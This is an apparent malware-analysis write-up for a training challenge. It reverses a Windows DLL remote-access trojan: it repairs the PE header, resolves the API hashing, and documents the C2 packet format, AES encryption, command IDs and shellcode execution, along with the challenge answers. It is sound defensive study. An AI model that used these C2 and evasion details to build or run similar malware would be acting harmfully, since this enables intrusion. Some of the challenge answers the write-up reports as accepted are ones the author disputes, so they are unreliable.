000000d0 7d 45 a8 fb bf 2a a1 fa 7d 45 a2 fb bb 2a a1 fa |}E...*..}E...*..|
000000e0 7d 45 a3 fb b8 2a a1 fa 52 69 63 68 b9 2a a1 fa |}E...*..Rich.*..|
000000f0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
00000100 00 00 00 00 00 00 00 00 00 00 64 86 06 00 f3 76 |..........d....v|
00000110 b9 60 00 00 00 00 00 00 00 00 f0 00 22 20 0b 02 |.`.........." ..|
00000120 0e 19 00 0a 01 00 00 d0 00 00 00 00 00 00 88 46 |...............F|
00000130 00 00 00 10 00 00 00 00 00 80 01 00 00 00 00 10 |................|
00000140 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 |................|
00000150 00 00 00 00 00 00 00 20 02 00 00 04 00 00 00 00 |....... ........|
00000160 00 00 02 00 60 01 00 00 10 00 00 00 00 00 00 10 |....`...........|
00000170 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 |................|
00000180 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 |................|
00000190 00 00 00 00 00 00 34 ae 01 00 28 00 00 00 00 00 |......4...(.....|
000001a0 00 00 00 00 00 00 00 e0 01 00 58 11 00 00 00 00 |..........X.....|
000001b0 00 00 00 00 00 00 00 10 02 00 4c 06 00 00 e4 96 |..........L.....|
000001c0 01 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 |................|
000001d0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 97 |................|
We also make note of the pointer to the PE header (at offset 0x3C). At 0x3C we see 0x0108; that makes sense, since we’re seeing a Rich Header in between. Around 0x0108 is where we’re starting to see some data: 00 00 64 86 06 00 f3 76 b9 60. The 64 86 bytes are a good sign, as they indicate an x86-64 binary.
Let’s insert the magic bytes. Note that the PE signature is a 4-byte header: 50 45 00 00. The 00 00 remains, but the PE was stripped.
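Both repairs can be scripted. The following is a minimal sketch that assumes exactly the damage described here (the leading MZ removed, and the two letters of the PE signature removed while its two zero bytes remain); the function name repair_pe is ours, and the demo buffer is a synthetic stand-in rather than the real sample.

```python
import struct


def repair_pe(damaged: bytes) -> bytes:
    """Restore the stripped 'MZ' and 'PE' markers of a damaged PE file."""
    # Step 1: put the DOS magic back in front of the file.
    data = bytearray(b"MZ" + damaged)
    # Step 2: e_lfanew (offset 0x3C) tells us where "PE\0\0" should start.
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    # Only the two letters were stripped; the trailing 00 00 is still there.
    if data[e_lfanew : e_lfanew + 2] != b"PE":
        data[e_lfanew:e_lfanew] = b"PE"
    return bytes(data)


# Synthetic demo: a zero-filled header with e_lfanew = 0x108 and machine 0x8664.
good = bytearray(0x10E)
good[0:2] = b"MZ"
struct.pack_into("<I", good, 0x3C, 0x108)
good[0x108:0x10C] = b"PE\x00\x00"
good[0x10C:0x10E] = b"\x64\x86"

# Apply the same damage as in the challenge file, then undo it.
damaged = bytes(good[2:0x108] + good[0x10A:])
print(repair_pe(damaged) == bytes(good))
```

On the real sample we would read the challenge file, pass its contents through the function, and write the result to a new file before handing it to file or Binary Ninja.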
Now we’re getting somewhere!
$ file aurat/challenge
aurat/challenge: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
And indeed, Binary Ninja is now able to fully parse the DLL.
We start off at the DLL entrypoint, and identify the first non-library function at 180003fc0.
180003fc0 int64_t r_main(int64_t arg1, int32_t arg2)
180003fc7     if (arg2 == 1)
180003fdf         sub_180001000(0x1acb4b50)("DLL_PROCESS_ATTACH")
18000401b         sub_180001000(0x26662fcc)(0, 0, sub_180003f60, &data_18001c9f0, 0, 0)
18000401b
18000402b     return 1
There appears to be some obfuscation going on; the call to sub_180001000 receives a 32-bit constant and returns a function pointer. If we click into sub_180003f60, we see more calls to sub_180001000.
Inside sub_180001000 we see a familiar structure: zx.q(*(zx.q(*(result + 0x3c)) + result + 0x88)) + result. The 0x3C navigates to the PE Header, and 0x88 is the offset for the Export Address Table. We give it the type IMAGE_EXPORT_DIRECTORY* and the rest of the API hashing becomes clear:
180001000 void* sub_180001000(enum hashdb_strings_mult21_add arg1)
180001008     void* DLL_base = get_dll_base()
180001008
180001013     if (DLL_base == 0)
18000101a         return DLL_base
18000101a
18000101e     int32_t i = 0
18000102e     IMAGE_EXPORT_DIRECTORY* eat =
18000102e         zx.q(*(zx.q(*(DLL_base + 0x3c)) + DLL_base + 0x88)) + DLL_base
180001035     uint32_t num_exports = eat->NumberOfNames
180001039     char** names = zx.q(eat->AddressOfNames) + DLL_base
180001039
18000103f     if (num_exports != 0)
180001071         do
180001044             int32_t hash = 0
180001046             char* name = zx.q(*names) + DLL_base
180001046
18000104e             for (char c = *name; c != 0; c = *name)
180001053                 name = &name[1]
18000105a                 hash = hash * 0x21 + sx.d(c)
18000105a
180001065             if (hash == arg1)
1800010a3                 return zx.q(*(zx.q(eat->AddressOfFunctions) + DLL_base + (zx.q(
1800010a3                     *(zx.q(eat->AddressOfNameOrdinals) + DLL_base + (sx.q(i) << 1)))
1800010a3                     << 2))) + DLL_base
1800010a3
180001067             names += 4
18000106b             i += 1
180001071         while (i u< num_exports)
180001071
18000107f     return 0
Looking up the hash in HashDB (using the Binary Ninja plugin) tells us the same thing: it’s mult21_add. Resolving a hash with this plugin creates an enum type called hashdb_strings_mult21_add. We apply this type to the argument of sub_180001000 to greatly improve the readability of every API hashing call.
The DLLMain function now becomes:
180003fc0 int64_t r_main(int64_t arg1, int32_t arg2)
180003fc7     if (arg2 == 1)
180003fdf         sub_180001000(OutputDebugStringA)("DLL_PROCESS_ATTACH")
18000401b         sub_180001000(CreateThread)(0, 0, sub_180003f60, &data_18001c9f0, 0, 0)
18000401b
18000402b     return 1
Much better!
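The hashing loop in sub_180001000 is small enough to reproduce by hand, which is a nice way to confirm a HashDB hit. The sketch below assumes ASCII export names (so the sign extension in the decompilation does not matter) and 32-bit wrap-around; the function names and the candidate list are ours.

```python
from typing import Optional


def mult21_add(name: str) -> int:
    """hash = hash * 0x21 + c for every character, truncated to 32 bits."""
    h = 0
    for c in name.encode("ascii"):
        h = (h * 0x21 + c) & 0xFFFFFFFF
    return h


def resolve(hash_value: int, export_names: list[str]) -> Optional[str]:
    """Return the first export whose hash matches, mimicking the lookup loop."""
    for name in export_names:
        if mult21_add(name) == hash_value:
            return name
    return None


print(hex(mult21_add("CreateThread")))                                 # 0x26662fcc
print(resolve(0x26662FCC, ["Sleep", "CreateThread", "VirtualAlloc"]))  # CreateThread
```

The hash of CreateThread matches the constant passed in r_main, so the algorithm and the resolved name agree.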
Scrolling through the functions following sub_180001000, we note that there are several that look similar but do slightly different things. Consider, e.g., sub_1800012d0, which performs an API lookup in msvcrt, and sub_180001160, which specifically looks for wsprintfA in user32.dll. Using HashDB we quickly resolve these as well, and add them to our enum.
In sub_180003f60 we see two functions. While it is tempting to dive into sub_180002110 and rebuild the structure, it appears the interesting code happens in sub_180002460. Still it is useful to at least create the structure that sub_180002110 initializes, so that we can quickly cross-reference interesting fields later.
Note that the blob of data at data_18001c9f0 is passed along into sub_180002460. It appears to be accessed through fields as well, so we also convert this to a struct.
We can now work our way through the functions that are being called, some of which are more interesting than others. sub_180003930 tests whether the binary is running as SYSTEM, and whether it is called svchost.exe. sub_180003720 sets up a TCP connection to a host that’s hardcoded in the data that is passed to the thread (interesting!). And sub_180003290 constructs a packet of data!
“What is the magic value that must start every C2 packet (0x00000000)?”
Inside sub_180003290 we see cryptographic operations, a call to sub_180001cf0 and then a call to ws2_32’s send API. Diving into sub_180001cf0 we immediately see the magic constant that is copied into the packet buffer: 0x37f457d1.
We note that directly following the magic header is a timestamp (i.e., the output of QueryPerformanceCounter) and the constant that is passed to the function (2; perhaps an opcode).
“What command ID (0x??) makes the malware sleep or exit?”
Following along in the main thread code, we make note of a call to recv at address 180002705. After this call, we’ll expect command parsing logic.
At 180002b3c we see a call to closesocket and Sleep. This must be the command we’re looking for. Following the branches upwards, we can see that this branch is the else-case for the check whether the command ID is not 3, so this command corresponds to ID 0x03.
“What command ID (0x??) triggers system information exfiltration?”
That appears to be command 0x05, which executes sub_180003ae0. It reads the contents of \\SYSTEM\svchost.exe, and sends it off together with a buffer stored in the thread structure.
I’m not sure if I would call that ‘system information exfiltration’, but it’s as close as it gets.
“What command ID (0x??) terminates the malware immediately?”
The main loop runs until a flag in the data struct is set to 1; each iteration of the loop hits a check at 1800026b2 that verifies whether this flag is still zero.
The code at 180002b46, when the opcode is 0x0E, does not really do anything besides set this flag to 1. This breaks the loop and triggers the termination code.
“What command ID (0x??) loads a new module into memory?”
This happens for command ID 0x08. At 1800029c5 the memory block is marked as executable, and at 1800029de the newly loaded code is executed.
“What packet type is sent for authentication (answer: int)?”
After starting and establishing a TCP connection, the function at sub_180003290 sends the first C2 packet. The packet header contains the type: 2.
“What encryption algorithm protects C2 communication?”
As discussed in Question 1, the function at sub_180001cf0 is responsible for building the packet. After constructing the packet, sub_180001b10 is used to encrypt its contents.
The crucial call is CryptImportKey, which sets up the key context. Its second argument is an array specifying the key type. After fixing the data types, we find the following:
180001ba2 pbdata.blobheader.aiKeyAlg = CALG_AES_128
180001ba9 pbdata.blobheader.bType = PLAINTEXTKEYBLOB
180001ba9 pbdata.blobheader.bVersion = CUR_BLOB_VERSION
180001ba9 pbdata.blobheader.reserved = 0
180001bb0 pbdata.aes_sid = ALG_SID_AES_256
The algorithm name we’re looking for is AES.
“How many bytes is the encryption key (answer= int)?”
The key is copied directly after the key structure is initialized, at 180001bc9. It’s a 16-byte key. The Algorithm ID (CALG_AES_128) also gave that away.
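As a cross-check, here is a minimal sketch of the documented PLAINTEXTKEYBLOB layout: a BLOBHEADER, followed by a DWORD key length, followed by the raw key bytes. Under that reading, the field typed as aes_sid in the listing above may simply be the key length, since ALG_SID_AES_256 has the numeric value 16, which is also the AES-128 key size in bytes. The helper names and the all-zero key are placeholders of mine, not values from the sample.

```python
import struct

# Documented wincrypt.h constants.
PLAINTEXTKEYBLOB = 0x08
CUR_BLOB_VERSION = 0x02
CALG_AES_128 = 0x0000660E
ALG_SID_AES_256 = 16  # numerically equal to a 16-byte key length


def build_plaintext_key_blob(key, alg_id=CALG_AES_128):
    """Pack BLOBHEADER + DWORD key length + raw key bytes (little-endian)."""
    header = struct.pack("<BBHI", PLAINTEXTKEYBLOB, CUR_BLOB_VERSION, 0, alg_id)
    return header + struct.pack("<I", len(key)) + key


def parse_plaintext_key_blob(blob):
    """Split a blob back into its header fields, key length and key."""
    b_type, b_version, reserved, alg_id, key_len = struct.unpack_from("<BBHII", blob)
    return {
        "bType": b_type,
        "bVersion": b_version,
        "reserved": reserved,
        "aiKeyAlg": alg_id,
        "key_len": key_len,
        "key": blob[12:12 + key_len],
    }


# Placeholder key (hypothetical), NOT the key embedded in the sample.
blob = build_plaintext_key_blob(bytes(16))
info = parse_plaintext_key_blob(blob)
print(hex(info["aiKeyAlg"]), info["key_len"])
```

The 12-byte prefix (8-byte header plus 4-byte length) is why the key copy lands directly behind the initialized structure.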
“How many bytes of configuration are hashed for auth (answer = int)?”
We backtrack to sub_180003290 where the authentication packet is set up. It contains a call to CryptHashData, where 0x278 bytes of data are hashed. That’s 632 in decimal.
“What crypto provider type is used for algorithm (answer = int)?”
That’s a bit of a vaguely worded question, and it is not immediately clear which crypto provider is being referred to. There are two instances; one for the MD5 hash, and one for the AES encryption. They can be found by looking at CryptAcquireContextA calls.
The fourth argument specifies the dwProvType. In the case of MD5 the code uses PROV_RSA_FULL (type 0x1), and in the case of AES the code uses PROV_RSA_AES (type 0x18). The latter turns out to be the required answer, which is 24 in decimal.
“What size is added to encrypted packet allocation (answer = int)?”
The allocation at 180001d94 is crucial here: 0x74 bytes are allocated in addition to the data length passed into sub_180001cf0. That’s 116 in decimal.
“What is the sleep duration between failed C2 connections (ms)?”
We cannot directly search for the Sleep symbol, but we can search for the hash. Using the HashDB enum, we see that the API hash for Sleep is 0x61ae5d9. Searching the disassembly leads us to a couple of mov instructions that set up the API resolution for Sleep. All instances show a 120000 ms delay.
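The same search can be done outside the disassembler by scanning the raw bytes for the hash as a little-endian dword. This is a minimal sketch; the buffer below is synthetic (a mov ecx, imm32 with some padding) and only stands in for the real code, and the register used by the sample is not something I'm asserting here.

```python
import struct

SLEEP_HASH = 0x061AE5D9  # hash for Sleep, taken from the HashDB enum


def find_imm32(data, value):
    """Return every offset where `value` occurs as a little-endian dword."""
    needle = struct.pack("<I", value)
    offsets = []
    pos = data.find(needle)
    while pos != -1:
        offsets.append(pos)
        pos = data.find(needle, pos + 1)
    return offsets


# Synthetic stand-in for code bytes: nop, nop, mov ecx, imm32, nop.
sample = b"\x90\x90\xb9" + struct.pack("<I", SLEEP_HASH) + b"\x90"
hits = find_imm32(sample, SLEEP_HASH)
print(hits)
```

Each hit still needs to be checked by hand, since a four-byte pattern can also show up in unrelated data.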
“How many bytes are checked for packet magic?”
The packet header is checked at 180002725. It’s a 4-byte header, and all four bytes are compared using cmp dword [rax], 0x37f457d1.
For some reason the Malops system does not accept 4, though, and I ended up brute-forcing my way to the answer 16. I believe that’s incorrect, and I’ve mentioned it to the challenge author in the Discord channel.
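To make the 4-byte claim concrete, here is a small sketch of what that dword comparison amounts to on the receiving side. The function name and the padding after the magic are mine; only the constant and the 4-byte width come from the disassembly.

```python
import struct

C2_MAGIC = 0x37F457D1


def has_valid_magic(packet):
    """Mirror `cmp dword [rax], 0x37f457d1`: compare the first 4 bytes only."""
    if len(packet) < 4:
        return False
    (magic,) = struct.unpack_from("<I", packet, 0)
    return magic == C2_MAGIC


# Hypothetical packets: only the first dword matters for this check.
good = struct.pack("<I", C2_MAGIC) + b"\x00" * 12
bad = b"\x00" * 16
print(has_valid_magic(good), has_valid_magic(bad))
```

On the wire the magic therefore appears as the byte sequence d1 57 f4 37.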
“What file does malware read for process hollowing?”
At 1800024a8, at the start of the main thread, the malware checks whether it is running as svchost.exe, presumably as the result of process hollowing. That means that the injection must have already taken place before this point. There is not really much code before this point other than the thread struct initialization, though. Perhaps the assumption here is that some parent process has injected this sample.
The command ID 0x05 does lead to subprocess injection into svchost.exe via sub_180003ae0, but to get there, we would already need to be running as svchost.exe.
“What hash value is compared to find RtlAllocateHeap (0x00000000)?”
We can consult our API enum: that’s 0x278e4f75.
Note that this question used to ask for the hash for HeapAlloc instead of RtlAllocateHeap. This has since been fixed.
“What file name is appended to Windows directory?”
In thread structure initialization, we spot the path \\Temp\auk.exe at 180002242. So the answer is auk.exe here.
“What buffer size is used for hostname?”
In the thread structure initialization at 18000234d we see a buffer of length 0x100 (256 bytes) that’s being passed to gethostname.
“What protection flag is set for shellcode execution ?”
Command IDs 6 and 7 seem to relate to executing loaded code. It is stored in a buffer that is marked as PAGE_EXECUTE_READWRITE using a call to VirtualProtect. The corresponding constant is 0x40. Against all conventions, the question expects the answer in decimal: 64.
“What debug string indicates receive failure?”
At address 180002d3f, we see the string Recv  failed. Note that there are two spaces separating the words.
“How many times is socket created on connection failure?”
The TCP connection is established in sub_180003720. We make note of three calls to ws2_32.socket. This corresponds to the three hardcoded IP addresses that are attempted.
“What mutex prevents multiple instances?”
That’s the mutex created at 1800024d7, called V4.0.
“What Win32 error type name indicates mutex exists (string)?”
That’s error code 0xb7, which corresponds to ERROR_ALREADY_EXISTS in the WIN32_ERROR enumeration type.
“what is the address of the function convert hostname to IP (0x00000000)?”
It’s referenced from sub_180003720, which tries to set up a TCP connection: sub_1800035f0 converts a hostname to an IP address.
“How many commands are handled in malware command dispatch?”
The branches are sometimes negated (e.g., checking whether the command ID is unequal to 0x05) so it’s a bit finicky. Let’s create a brief table:
| ID | Address | Description |
|---|---|---|
| 0x03 | 180002b01 | Sleep. |
| 0x04 | 180002b46 | Related to shellcode. |
| 0x05 | 180002882 | Send data and content of svchost.exe? |
| 0x06 | 18000288f | Related to executing shellcode. |
| 0x07 | 18000288f | Related to executing shellcode. |
| 0x08 | 1800028ed | Related to plugin functions. |
| 0x09 | 180002937 | Related to cleaning up plugins. |
| 0x0A | 1800027bf | Send a packet of type 0x08 containing a flag value. |
| 0x0B | 180002b46 | Related to WTSEnumerateSessionsA. |
| 0x0C | 180002c3a | Unclear; relates to testing if user is admin. |
| 0x0D | 180002b9b | Create /Temp/auk.exe |
| 0x0E | 180002b46 | Terminate the program. |
That’s 12 cases. The challenge website accepts 15 as the correct answer, though. That’s odd, since there are no cases that handle command ID 0x00, 0x01 and 0x02; those command IDs fail the test at 180002c2c and trigger a jump back to the start of the loop.
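A quick sanity check of the counting, as a sketch. The handled IDs are the ones I found in the dispatch code; the idea that 15 counts every ID from 0x00 through 0x0E is purely my guess at how the expected answer was derived, and nothing in the sample confirms it.

```python
# Command IDs that have a handler in the dispatch code, per my analysis.
HANDLED_IDS = list(range(0x03, 0x0E + 1))

# IDs that fail the range test and jump back to the start of the loop.
UNHANDLED_IDS = [0x00, 0x01, 0x02]


def is_handled(cmd_id):
    """True if the dispatcher has a case for this command ID."""
    return cmd_id in HANDLED_IDS


handled_count = len(HANDLED_IDS)
# Hypothetical reading of the accepted answer: count every ID up to 0x0E.
inclusive_count = len(UNHANDLED_IDS) + handled_count
print(handled_count, inclusive_count)
```

If that guess is right, the accepted answer describes the ID range rather than the number of implemented handlers.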
“What is the hash multiplier constant used in malware hash algorithm?”
As discussed above, the algorithm is mult21_add. That’s 0x21 though, so 33 in decimal.
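For reference, a minimal reimplementation of the hash as I understand it: multiply the running value by 0x21, add the next byte, and truncate to 32 bits. The initial value of zero and the truncation are assumptions on my part, but they reproduce the Sleep hash from the HashDB enum.

```python
def mult21_add(name):
    """Multiply-by-0x21-and-add hash over the bytes of an API name."""
    value = 0  # assumed starting value
    for byte in name:
        value = (value * 0x21 + byte) & 0xFFFFFFFF  # keep it a 32-bit value
    return value


sleep_hash = mult21_add(b"Sleep")
print(hex(sleep_hash))
```

Running other export names through the same function is a convenient way to double-check entries in the enum by hand.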
“What is the total configuration buffer size (bytes) on the function that setup the configuration of the malware?”
The ‘function that sets up the configuration’ must refer to sub_180002110. It allocates four buffers, of length 0x80000, 0x104, 0x104 and 0x278. In addition, the overarching structure allocated outside of the function is 0x98 bytes in size.
I’ll admit I tried a variety of combinations of those. After mentioning my confusion on the Discord channel, I was told to try 0x278 (632 decimal). I suppose that makes sense; that buffer holds the computer name, username, IP address and malware version (V1.1). It’s also the buffer that is transmitted as part of the initial packet sent in sub_180003290.
“What is the socket protocol (integer) used for TCP connections?”
All socket calls take the arguments socket(2, 1, 6). The third argument is the protocol type: 6 is IPPROTO_TCP.
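For completeness, a small sketch that decodes the three integers into their Winsock names. The lookup tables only cover a handful of common values and the function name is mine.

```python
# Partial tables of documented Winsock constants.
ADDRESS_FAMILIES = {2: "AF_INET", 23: "AF_INET6"}
SOCKET_TYPES = {1: "SOCK_STREAM", 2: "SOCK_DGRAM"}
PROTOCOLS = {6: "IPPROTO_TCP", 17: "IPPROTO_UDP"}


def decode_socket_args(af, sock_type, protocol):
    """Translate socket(af, type, protocol) integers into symbolic names."""
    return (
        ADDRESS_FAMILIES.get(af, "unknown"),
        SOCKET_TYPES.get(sock_type, "unknown"),
        PROTOCOLS.get(protocol, "unknown"),
    )


decoded = decode_socket_args(2, 1, 6)
print(decoded)
```

So the sample opens a plain IPv4 stream socket and names TCP explicitly instead of passing 0 for the protocol.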